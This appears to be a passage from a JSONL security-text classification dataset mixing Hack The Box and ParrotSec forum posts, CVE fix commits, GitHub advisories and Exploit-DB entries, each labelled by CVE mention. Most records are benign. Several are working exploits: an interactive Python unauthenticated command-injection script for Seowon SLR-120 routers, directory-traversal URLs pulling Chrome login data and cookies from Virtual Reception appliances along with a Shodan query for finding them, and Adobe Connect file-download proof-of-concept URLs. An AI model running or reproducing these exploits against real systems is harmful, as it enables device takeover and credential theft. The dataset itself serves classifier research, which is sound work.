"2022-07-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a94a09380f23546c46d1", "text": "First of all the module does not teach you extensively more about it. You have to research a little. this lesson is to teach you about subdomain or subdirectory in a website. so you can use gobuster also. Another thing to note is dont add -fs first. What -fs does is it select the common size of all the namelist you use on ffuf. so if you see common size in namelist in ffuf its gonna be some number(status, size, words, lines, duration) you will see all. But -fs is for size which means it is to get common size. I am writing this for myself and others so its gonna be easy for them. Dont look for answer rightaway.", "source": "hackthebox", "timestamp": "2023-11-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "060e5f3ff8c800f61f3c", "text": "Virtual Reception v1.0 - Web Server Directory Traversal\n\n# Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal\n# Exploit Author: Spinae\n# Vendor Homepage: https://www.virtualreception.nl/\n# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY\n# Tested on: all\n# CVE-ID: CVE-2023-25289\n\nWe discovered the web server of the Virtual Reception appliance is prone to\nan unauthenticated directory traversal vulnerability. This allows an\nattacker to traverse outside the server root directory by specifying files\nat the end of a URL request.\nThis is a NUC5i5RY\n\nhttp://[ip address]/c:/WINDOWS/System32/drivers/etc/hosts\nhttp://[ip address]/C:/windows/WindowsUpdate.log\n...\n\nA user called 'receptie' exists on the Windows system:\n\nhttp://[ip address]/c:/users/receptie/ntuser.dat\nhttp://[ip address]/c:/users/receptie/ntuser.ini\nhttp://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log\n...\nhttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User\nData/Default/Login Data\nhttp://[ip\naddress]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20State\nhttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/User\nData/Default/Cookies\n...\n\nThe appliance also keeps a log of the visitors that register at the\nentrance:\n\nhttp://[ip address]/visitors.csv\n\nhash icon for shodan searches:\n\nhttps://www.shodan.io/search?query=http.favicon.hash%3A656388049\n\nNo reply from the vendor (phone, email, website form submissions), first\nreported in 2021.\n\n--\nDISCLAIMER: Unless indicated otherwise, the information contained in this\nmessage is privileged and confidential, and is intended only for the use of\nthe addressee(s) named above and others who have been specifically\nauthorized to receive it. If you are not the intended recipient, you are\nhereby notified that any dissemination, distribution or copying of this\nmessage and/or attachments is strictly prohibited. The company accepts no\nliability for any damage caused by any virus transmitted by this message.\nFurthermore, the company does not warrant a proper and complete\ntransmission of this information, nor does it accept liability for any\ndelays. If you have received this message in error, please contact the\nsender and delete the message. Thank you.", "source": "exploitdb", "timestamp": "2023-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9d34ddfe263a0419f477", "text": "CVE: CVE-2021-3609\n\n[{'lang': 'en', 'value': '.A flaw was found in the CAN BCM networking protocol in the Linux kernel, where a local attacker can abuse a flaw in the CAN subsystem to corrupt memory, crash the system or escalate privileges. This race condition in net/can/bcm.c in the Linux kernel allows for local privilege escalation to root.'}]\n\nFix commit: can: bcm: delay release of struct bcm_op after synchronize_rcu()\n\ncan_rx_register() callbacks may be called concurrently to the call to\ncan_rx_unregister(). The callbacks and callback data, though, are\nprotected by RCU and the struct sock reference count.\n\nSo the callback data is really attached to the life of sk, meaning\nthat it should be released on sk_destruct. However, bcm_remove_op()\ncalls tasklet_kill(), and RCU callbacks may be called under RCU\nsoftirq, so that cannot be used on kernels before the introduction of\nHRTIMER_MODE_SOFT.\n\nHowever, bcm_rx_handler() is called under RCU protection, so after\ncalling can_rx_unregister(), we may call synchronize_rcu() in order to\nwait for any RCU read-side critical sections to finish. That is,\nbcm_rx_handler() won't be called anymore for those ops. So, we only\nfree them, after we do that synchronize_rcu().\n\nFixes: ffd980f976e7 (\"[CAN]: Add broadcast manager (bcm) protocol\")\nLink: https://lore.kernel.org/r/20210619161813.2098382-1-cascardo@canonical.com\nCc: linux-stable \nReported-by: syzbot+0f7e7e5e2f4f40fa89c0@syzkaller.appspotmail.com\nReported-by: Norbert Slusarek \nSigned-off-by: Thadeu Lima de Souza Cascardo \nAcked-by: Oliver Hartkopp \nSigned-off-by: Marc Kleine-Budde ", "source": "cvefixes", "timestamp": "2022-03-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "60f6e560d5aa51990348", "text": "CVE: CVE-2022-24786\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C. PJSIP versions 2.12 and prior do not parse incoming RTCP feedback RPSI (Reference Picture Selection Indication) packet, but any app that directly uses pjmedia_rtcp_fb_parse_rpsi() will be affected. A patch is available in the `master` branch of the `pjsip/pjproject` GitHub repository. There are currently no known workarounds.'}]\n\nFix commit: Merge pull request from GHSA-vhxv-phmx-g52q\n\n* Prevent OOB read/write when parsing RTCP FB RPSI\n\n* Add log information\n\n* Modification based on comments.", "source": "cvefixes", "timestamp": "2022-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e10774a468aafaf13965", "text": "CVE: CVE-2022-29254\n\n[{'lang': 'en', 'value': 'silverstripe-omnipay is a SilverStripe integration with Omnipay PHP payments library. For a subset of Omnipay gateways (those that use intermediary states like `isNotification()` or `isRedirect()`), if the payment identifier or success URL is exposed it is possible for payments to be prematurely marked as completed without payment being taken. This is mitigated by the fact that most payment gateways hide this information from users, however some issuing banks offer flawed 3DSecure implementations that may inadvertently expose this data. The following versions have been patched to fix this issue: `2.5.2`, `3.0.2`, `3.1.4`, and `3.2.1`. There are no known workarounds for this vulnerability.'}]\n\nFix commit: [CVE-2022-29254] Add extra validation on payment completion", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "dbc69674fbf7d304da6c", "text": "CVE: CVE-2022-31052\n\n[{'lang': 'en', 'value': \"Synapse is an open source home server implementation for the Matrix chat network. In versions prior to 1.61.1 URL previews of some web pages can exhaust the available stack space for the Synapse process due to unbounded recursion. This is sometimes recoverable and leads to an error for the request causing the problem, but in other cases the Synapse process may crash altogether. It is possible to exploit this maliciously, either by malicious users on the homeserver, or by remote users sending URLs that a local user's client may automatically request a URL preview for. Remote users are not able to exploit this directly, because the URL preview endpoint is authenticated. Deployments with `url_preview_enabled: false` set in configuration are not affected. Deployments with `url_preview_enabled: true` set in configuration **are** affected. Deployments with no configuration value set for `url_preview_enabled` are not affected, because the default is `false`. Administrators of homeservers with URL previews enabled are advised to upgrade to v1.61.1 or higher. Users unable to upgrade should set `url_preview_enabled` to false.\"}]\n\nFix commit: Merge pull request from GHSA-22p3-qrh9-cx32\n\n* Make _iterate_over_text easier to read by using simple data structures\n\n* Prefer a set of tags to ignore\n\nIn my tests, it's 4x faster to check for containment in a set of this size\n\n* Add a stack size limit to _iterate_over_text\n\n* Continue accepting the case where there is no body element\n\n* Use an early return instead for None\n\nCo-authored-by: Richard van der Hoff ", "source": "cvefixes", "timestamp": "2022-06-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "eba2337a429649737015", "text": "Anonsurf Works for Parrot and Kali and there is also one for Ubuntu 18.04 linuxhint.com Anonsurf Anonsurf is a privacy protection module that uses Tor IPTables for the configuration of IP packet filter rules. While Tor provides a browser solution, Anonsurf is capable of much more.This article will show you how to run Anonsurf’s Anon Mode. GitHub GitHub - Und3rf10w/kali-anonsurf: A port of ParrotSec's stealth and anonsurf... A port of ParrotSec's stealth and anonsurf modules to Kali Linux - GitHub - Und3rf10w/kali-anonsurf: A port of ParrotSec's stealth and anonsurf modules to Kali Linux GitHub GitHub - moonchitta/anonsurf-ubuntu: Parrot OS annonsurf ported to ubuntu Parrot OS annonsurf ported to ubuntu. Contribute to moonchitta/anonsurf-ubuntu development by creating an account on GitHub.", "source": "hackersploit", "timestamp": "2022-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8e6d0060b1d6a02bcf9e", "text": "CVE: CVE-2022-1154\n\n[{'lang': 'en', 'value': 'Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646.'}]\n\nFix commit: patch 8.2.4646: using buffer line after it has been freed\n\nProblem: Using buffer line after it has been freed in old regexp engine.\nSolution: After getting mark get the line again.", "source": "cvefixes", "timestamp": "2022-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "54d331920c60ec3159bd", "text": "CVE: CVE-2022-27157\n\n[{'lang': 'en', 'value': 'pearweb < 1.32 is suffers from a Weak Password Recovery Mechanism via include/users/passwordmanage.php.'}]\n\nFix commit: Be cautious about what can be unserialized", "source": "cvefixes", "timestamp": "2022-04-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "feaf4c892ad0d63b0f92", "text": "I’m sorry, most likely, the message will not reach the addressee, but isn’t trying to achieve the goal the path to success? I am engaged in multi-level testing of web resources, including Penetration Testing. If you still need it, I’ll be happy to help.", "source": "hackersploit", "timestamp": "2022-05-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "765621a07b994ac8abac", "text": "Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)\n\n# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)\n# Date: 2022-03-11\n# Exploit Author: Aryan Chehreghani\n# Vendor Homepage: http://www.seowonintech.co.kr\n# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30\n# Version: All version\n# Tested on: Windows 10 Enterprise x64 , Linux\n# CVE : CVE-2020-17456\n\n# [ About - Seowon SLR-120 router ]:\n\n#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,\n#The convenience of sharing wireless internet access invigorates your lifestyle, families,\n#friends and workmates. Carry it around to boost your active communication anywhere.\n\n# [ Description ]:\n\n#Execute commands without authentication as admin user ,\n#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.\n\n# [ Vulnerable products ]:\n\n#SLR-120S42G\n#SLR-120D42G\n#SLR-120T42G\n\nimport requests\n\nprint ('''\n###########################################################\n# Seowon SLR-120S42G router - RCE (Unauthenticated) #\n# BY:Aryan Chehreghani #\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\n# mail:aryanchehreghani@yahoo.com #\n# -+-USE:python script.py #\n# Example Target : http://192.168.1.1:443/ #\n###########################################################\n''')\n\nurl = input (\"=> Enter Target : \")\n\nwhile(True):\n\n try:\n\n cmd = input (\"~Enter Command $ \")\n\n header = {\n\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0\",\n\"Accept\": \"*/*\",\n\"Accept-Language\": \"en-US,en;q:0.5\",\n\"Accept-Encoding\": \"gzip, deflate\",\n\"Content-Type\": \"application/x-www-form-urlencoded\",\n\"Content-Length\": \"207\",\n\"Origin\": \"http://192.168.1.1\",\n\"Connection\": \"close\",\n\"Referer\": \"http://192.168.1.1/\",\n\"Upgrade-Insecure-Requests\": \"1\"\n}\n\n datas = {\n'Command':'Diagnostic',\n'traceMode':'ping',\n'reportIpOnly':'',\n'pingIpAddr':';'+cmd,\n'pingPktSize':'56',\n'pingTimeout':'30',\n'pingCount':'4',\n'maxTTLCnt':'30',\n'queriesCnt':'3',\n'reportIpOnlyCheckbox':'on',\n'logarea':'com.cgi',\n'btnApply':'Apply',\n'T':'1646950471018'\n}\n\n x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)\n\n print(x.text)\n\n except:\n break", "source": "exploitdb", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "911953e7f26406d161df", "text": "In typical fashion I got this two minutes after I posted. I could have sworn I tried this method a few times already but this seemed work this time. My clues would CUPP Harry usernameGenerator Harry Potter maybe don’t be so sed about this one.", "source": "hackthebox", "timestamp": "2022-01-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "403ca14be3b283770165", "text": "As the Gattsu mentioned above, the problem is PHP code. Try to simplify it, how could you execute ls command within PHP without passing it through parameter?", "source": "hackthebox", "timestamp": "2023-04-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3335fd3dab525d3a68c7", "text": "Can someone give a hint on elasticity? The web api seem to accept some chars, e.g. \\ or quotes, but I don’t seem to be able to do anything with it. Internal ports 9200/9300 not responding. Not sure what to do at this point.", "source": "hackthebox", "timestamp": "2023-07-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c127743ac8a3b0b1fbe2", "text": "hey bro did you solve this problem? Create a “For” loop that encodes the variable “var” 28 times in “base64”. The number of characters in the 28th hash is the value that must be assigned to the “salt” variable. it gives me this error Extra arguments given. enc: Use -help for summary. can u help me please?", "source": "hackthebox", "timestamp": "2022-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4fe5f32557dc6874e380", "text": "Hi @kekeli If you haven’t already, first learn the IPv4 network stack along with how to subnet. Knowing the basics of Linux is a big step too. (YouTube and Google are your “friends”.) Optional*: Set up a virtual machine program (like VirtualBox, VMware, etc.) with Windows and Linux (Parrot) guests to act as your ethical hacking lab. Ensure the two or so VM guests (and host) can see each other over the bridged virtual network (ping). *If you are running Parrot on bare metal, you would only need a Windows virtual machine guest (at first). If you are running Windows, I recommend a Windows VM as well in which to practice your skills without damaging the host. Play around and get familiar with Nmap and Wireshark . Send packet snips from nmap from one PC and see how Wireshark shows the scan. Concentrate mainly on Wireshark to see the type of traffic which is normal, and then play around with nmap. Once you get good, Metasploit would be the 3rd “hacking” tool to learn. People may say “Join Hack The Box and TryHackMe ”, and you should, eventually. Have “fun”.", "source": "parrotsec", "timestamp": "2023-03-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "19f3c30c7c1d0f225ebb", "text": "Change username in community profile\n\nHow do i change my username in parrotsec community profile?", "source": "parrotsec", "timestamp": "2023-08-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3c1beff6b18ba382824b", "text": "MantisBT cross-site scripting (XSS) vulnerability through crafted PATH_INFO\n\n[Severity: MEDIUM]\n\nA cross-site scripting (XSS) vulnerability in the View Filters page (view_filters_page.php) and Edit Filter page (manage_filter_edit_page.php) in MantisBT 2.1.0 through 2.17.0 allows remote attackers to inject arbitrary code (if CSP settings permit it) through a crafted PATH_INFO. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-13055.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7d7b1634b5b44ab47330", "text": "Learn hacking from scratch\n\nHello guys, i am very much interested in hacking i have searched alot of things but i did nothing i found had a good foundation if anyone could guide me what to follow from scratch your help will be much appreciated. i am sure other new people who are looking for learning hacking from scratch will fill find this helpful aswell. Thank you.", "source": "parrotsec", "timestamp": "2022-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a546477bcc2667b988a9", "text": "CVE: CVE-2021-3640\n\n[{'lang': 'en', 'value': 'A flaw use-after-free in function sco_sock_sendmsg() of the Linux kernel HCI subsystem was found in the way user calls ioct UFFDIO_REGISTER or other way triggers race condition of the call sco_conn_del() together with the call sco_sock_sendmsg() with the expected controllable faulting memory page. A privileged local user could use this flaw to crash the system or escalate their privileges on the system.'}]\n\nFix commit: Bluetooth: sco: Fix lock_sock() blockage by memcpy_from_msg()\n\nThe sco_send_frame() also takes lock_sock() during memcpy_from_msg()\ncall that may be endlessly blocked by a task with userfaultd\ntechnique, and this will result in a hung task watchdog trigger.\n\nJust like the similar fix for hci_sock_sendmsg() in commit\n92c685dc5de0 (\"Bluetooth: reorganize functions...\"), this patch moves\nthe memcpy_from_msg() out of lock_sock() for addressing the hang.\n\nThis should be the last piece for fixing CVE-2021-3640 after a few\nalready queued fixes.\n\nSigned-off-by: Takashi Iwai \nSigned-off-by: Marcel Holtmann ", "source": "cvefixes", "timestamp": "2022-03-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "349ef351956d846762b4", "text": "I really think that there be an issue with those KIA Souls they seemed to be exploited very easily. My wife owns one and there is a rash of these being stolen with someone just getting an USB cable and an app on their phone. I wish there was a way to harden the ones that didn’t get the update from the manufacturer .", "source": "parrotsec", "timestamp": "2023-03-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0096d20ee594843a570f", "text": "It worked! Tell me, please, who is the expert on regular expressions. Who can I personally write to, consult. There are a couple of points that my grep filter has not mastered ( I had to filter out the extra passwords a little manually. Everything worked out, but I want to close this topic completely for myself. Yes, who can tell ьу, for the delay in the attack in BurpSuit, which parameter is responsible. Bypass timing protection. Error Handling?", "source": "hackthebox", "timestamp": "2022-07-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "50be7eeb94a4c63e2c4e", "text": "CVE: CVE-2021-3979\n\n[{'lang': 'en', 'value': 'A key length flaw was found in Red Hat Ceph Storage. An attacker can exploit the fact that the key length is incorrectly passed in an encryption algorithm to create a non random key, which is weaker and can be exploited for loss of confidentiality and integrity on encrypted disks.'}]\n\nFix commit: ceph-volume: honour osd_dmcrypt_key_size option\n\nceph-volume doesn't honour osd_dmcrypt_key_size.\nIt means the default size is always applied.\n\nIt also changes the default value in `get_key_size_from_conf()`\n\nFrom cryptsetup manpage:\n\n> For XTS mode you can optionally set a key size of 512 bits with the -s option.\n\nUsing more than 512bits will end up with the following error message:\n\n```\nKey size in XTS mode must be 256 or 512 bits.\n```\n\nFixes: https://tracker.ceph.com/issues/54006\n\nSigned-off-by: Guillaume Abrioux ", "source": "cvefixes", "timestamp": "2022-08-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "38028c79ceda601e197f", "text": "People, tell me about the overflow . RIP under control, but how can I put the reverse shell into 72 bytes? My shellcode is at least 95 bytes?", "source": "hackthebox", "timestamp": "2023-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0fb6e33b59f969d080b1", "text": "Hi Swindler, I’ve been trying all different ways the past week. Can you share how you were able to dump the contents of the flag in an error msg? I’m clicking on the Move folder, then injecting my command after the “to=” on the GET request. I’m getting different error messages, but it’s only showing exactly what I type in instead of the contents of the flag. Please help!", "source": "hackthebox", "timestamp": "2023-04-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5c5235e2baaa2fd56663", "text": "AES256-CTR Attack for CTF Challenge\n\nHello, I have a CTF challenge at my university and unfortunately I don’t know what to do next. Here are all the clues: I can enter my student ID and get a cipher text back. Flags have the format {f=XXX}, where XXX consists of 12 pseudo-random characters from the alphabet “0123456789abcdef”. Here is the code that calculates the cipher text: import os from Crypto.Cipher import AES def encrypt(msg): nonce = os.urandom(8) key = os.urandom(32) c = b'' for i in range((len(msg)//16)+1): aes = AES.new(key,AES.MODE_CTR, nonce = nonce) c +=aes.encrypt(msg[16*i:16*(i+1)]) return c plaintext = '''GET / HTTP/1.1\\r\\nHost: ctf.itsc.uni-xxx.de\\r\\nUser-Agent: Mozilla\\5.9 (X11; Ubuntu: Linux x86_64; rv:62.0) Gecko/20100101 Firefox/ 62.0\\r\\nAccept: text/html,application/xhtml+xml,application/xml;qU0.9,*/*;q=0.8\\r\\nAccept-Language: en-US,en;q=0.5\\r\\nAccept-Encoding: gzip, deflate, br\\r\\nConnection: keep-alive\\r\\nCookie: {{f={}}}'''.format(flag) ciphertext = encrypt(plaintext.encode()).hex() The encryption code was implemented in Python3 and the PyCryptoDome library. There is another note that you should pay particular attention to how the counter mode was implemented. Example for student ID 1950243 is the cipher text: cb581035f90f6091ba1e9857a25f081bc4723761ec0f4bb18860de12ff0d2b64e2746962a35f58a09c3ad60aa20a601c86483770a40269a28b20c35cac236a6be5712874f91a06f5ce66ef57bd552544ee682a61a31408898720c21eac163d27d32b702ef65d5effd87c9956a54e4274ef762b3ae41f19f5de7f8757ac286c63e97b2b6df9191aebde43bd27ef0d6061f8276461b3575cea863ada0aa00f7561e0742774a24647abc136df12e1022e69e1716874a65f44ac8d2fc30fe3002a69e1717f64eb1f06fcc264984cb71f3821a225491f974c4ba09e3a9a2aed006264ed7a212ff64a46e8bb1d9b03e255742cbc337118dc6e4ba68b3ec34bc900667ee8742a72ec0f4fbf873e9b46e80b637ded692139f64d5ac8e40dd808e20b6665e5722a2ff6444da09e63d60ae518601c865e2b7abd464dffce35d15bbf0c3025e8297624e11b19f393 I tried reversing the calculation but without the key I couldn’t find myself in much progress. I also tried analyzing the cipher texts and while I was able to find similarities, I can’t seem to find anything else. I am not particularly looking for the complete solution, rather some clues as to what I might be missing. I would be happy if anyone could point the way", "source": "hackthebox", "timestamp": "2023-11-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fd21877b3b4d11886cc4", "text": "git-url-parse crate vulnerable to Regular Expression Denial of Service\n\n[Severity: LOW]\n\nThe git-url-parse crate through 0.4.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to `normalize_url` in `lib.rs`, a similar issue to CVE-2023-32758 (Python).", "source": "github_advisory", "timestamp": "2023-06-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "583faae0039dd367b1c5", "text": "OpenBullet 2 V0.2.4\n\nInstall the Microsoft .NET 6 (desktop apps version) from Download .NET 6.0 Download Link : sitehunterus.blogspot.com OpenBullet 2 V0.2.4 Install the Microsoft .NET 6 ( desktop apps version ) from Download .NET 6.0 Download Here VirusTotal Password Unrar is 1 VirusTotal: virustotal.com VirusTotal VirusTotal Password Unrar is 1", "source": "hackersploit", "timestamp": "2022-09-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c6481b4913d249e79496", "text": "CVE: CVE-2022-1722\n\n[{'lang': 'en', 'value': \"SSRF in editor's proxy via IPv6 link-local address in GitHub repository jgraph/drawio prior to 18.0.5. SSRF to internal link-local IPv6 addresses\"}]\n\nFix commit: Adds isLinkLocalAddress() to address checks", "source": "cvefixes", "timestamp": "2022-05-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "818b734023d9390365a0", "text": "Thanks for the shout out and I’m glad i contributed in some ways. Lets keep the fight and definitely wish you all the best in Information Security World. Let me know if you need any help going forward.", "source": "hackthebox", "timestamp": "2022-12-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e4efd198f390020ebb96", "text": "Command injection in OpenTSDB\n\n[Severity: CRITICAL]\n\nDue to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was previously disclosed as CVE-2020-35476. Regex validation that was implemented to restrict allowed input to the query API does not work as intended, allowing crafted commands to bypass validation.", "source": "github_advisory", "timestamp": "2023-05-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1ea9fa4be6b3b051e7aa", "text": "Can smb help me with overflown? Every time I got segm fault", "source": "hackthebox", "timestamp": "2023-10-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "113fa3768c5b28096b71", "text": "There is a lot of caveats for getting this lab to work. Have to use an IDE in the pwnbox VM on the browser, install .NET, and apparently have to be connected using the EU VPN…", "source": "hackthebox", "timestamp": "2023-09-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "98710f6158ba8b0085c9", "text": "Authorization Header forwarded on redirect\n\n[Severity: MEDIUM]\n\nurllib3 before 1.24.2 does not remove the authorization HTTP header when following a cross-origin redirect (i.e., a redirect that differs in host, port, or scheme). This can allow for credentials in the authorization header to be exposed to unintended hosts or transmitted in cleartext. NOTE: this issue exists because of an incomplete fix for CVE-2018-20060 (which was case-sensitive).", "source": "github_advisory", "timestamp": "2023-10-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f3d1abb08002941efc19", "text": "CVE: CVE-2021-45005\n\n[{'lang': 'en', 'value': 'Artifex MuJS v1.1.3 was discovered to contain a heap buffer overflow which is caused by conflicting JumpList of nested try/finally statements.'}]\n\nFix commit: Bug 704749: Clear jump list after patching jump addresses.\n\nSince we can emit a statement multiple times when compiling try/finally\nwe have to use a new patch list for each instance.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "732cb8f61e923be8256a", "text": "CTF Game vs. real world Pentesting\n\nHey folks, maybe you can help me with a brainbug: Most CTFs are based on Linux. Even THM, Vulnhub, etc. Not uncommon for webapps, but most (or nearly all) companies are running Windows and Active Directory stuff on their nets. I don’t want to raise the blinds even to OT/ICS/SCADA. Can anybody suggest material to learn/practice for “M$/AD Pentester’s Daily Grind”? Thank you Dom", "source": "hackersploit", "timestamp": "2023-06-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e51e83ad6a8fd229acbb", "text": "Adobe Connect 11.4.5 - Local File Disclosure\n\n# Title: Adobe Connect 11.4.5 - Local File Disclosure\n# Author: h4shur\n# date:2021.01.16-2023.02.17\n# CVE: CVE-2023-22232\n# Vendor Homepage: https://www.adobe.com\n# Software Link: https://www.adobe.com/products/adobeconnect.html\n# Version: 11.4.5 and earlier, 12.1.5 and earlier\n# User interaction: None\n# Tested on: Windows 10 & Google Chrome, kali linux & firefox\n\n### Summary:\nAdobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature.\nExploitation of this issue does not require user interaction.\n\n### Description :\nThere are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the \"adobe connect\" program, have vulnerabilities that occur every month. They are found and fixed by the team.\n* What is LFD bug?\nLFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug\n* Intruder access level with LFD bug\nThe level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access\n* Identify vulnerable sites\nTo search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file\n* And this time the \"lfd\" in \"adobe connect\" bug:\nTo download and exploit files, you must type the file path in the \"download-url\" variable and the file name and extension in the \"name\" variable.\nYou can download the file by writing the file path and file name and extension.\nWhen you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with \"Save to My Computer\nfile name]\" written in the download box and a file download link at the bottom of the download box, so you can download the file.\n* There are values inside the url that do not allow a file other than this file to be downloaded.\n* Values: sco_id and tickets\nBut if these values are cleared, you will see that reloading is possible without any obstacles\nAt another address, you can download multiple files as a zip file.\nWe put the address of the files in front of the variable \"ffn\" and if we want to add the file, we add the variable \"ffn\" again and put the address of the file in front of it. The \"download_type\" variable is also used to specify the zip extension.\n\n### POC :\nhttps://target.com/[folder]/download?download-url=[URL]&name=[file.type]\nhttps://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder]\n\n### References:\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232\nhttps://nvd.nist.gov/vuln/detail/CVE-2023-22232\nhttps://helpx.adobe.com/security/products/connect/apsb23-05.html", "source": "exploitdb", "timestamp": "2023-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "706423c024e33007509e", "text": "CVE: CVE-2021-44664\n\n[{'lang': 'en', 'value': \"An Authenticated Remote Code Exection (RCE) vulnerability exists in Xerte through 3.9 in website_code/php/import/fileupload.php by uploading a maliciously crafted PHP file though the project interface disguised as a language file to bypasses the upload filters. Attackers can manipulate the files destination by abusing path traversal in the 'mediapath' variable.\"}]\n\nFix commit: Security! Check and verify paths used by move_uploaded_file\n\n - Make sure uploaded files can only be saved in the USER-FILES\n subfolder", "source": "cvefixes", "timestamp": "2022-02-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9e5edb57ff0d0cb2be5e", "text": "Burp Browser cannot work with a modified /etc/hosts entry\n\nHello, I am having an issue using burp or any proxy for that matter when an IP address requires me to make an entry into the /etc/hosts file. Whenever I modify the /etc/hosts/ file and I try to visit the website, Burp gives me a default Spectrum Router info page. I do not have this issue with my browser on my Kali. I can visit the domain in /etc/hosts but not on Burp Browser and through foxyproxy. I do not have this issue when boxes do not have a domain name and just goes straight to IP address.", "source": "hackthebox", "timestamp": "2023-02-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f83ea5faaed334f360aa", "text": "Auto Dealer Management System 1.0 - Broken Access Control Exploit\n\n# Exploit Title: Auto Dealer Management System 1.0 - Broken Access Control Exploit\n\nIt leads to compromise of all application accounts by accessing the ?page=user/list with low privileged user account\n\n### Date:\n> 18 February 2023\n\n### CVE Assigned: **[CVE-2023-0916](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0916)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0916) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0916)\n\n### Author:\n> Muhammad Navaid Zafar Ansari\n### Vendor Homepage:\n> https://www.sourcecodester.com\n### Software Link:\n> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)\n### Version:\n> v 1.0\n### Broken Authentication:\n> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can 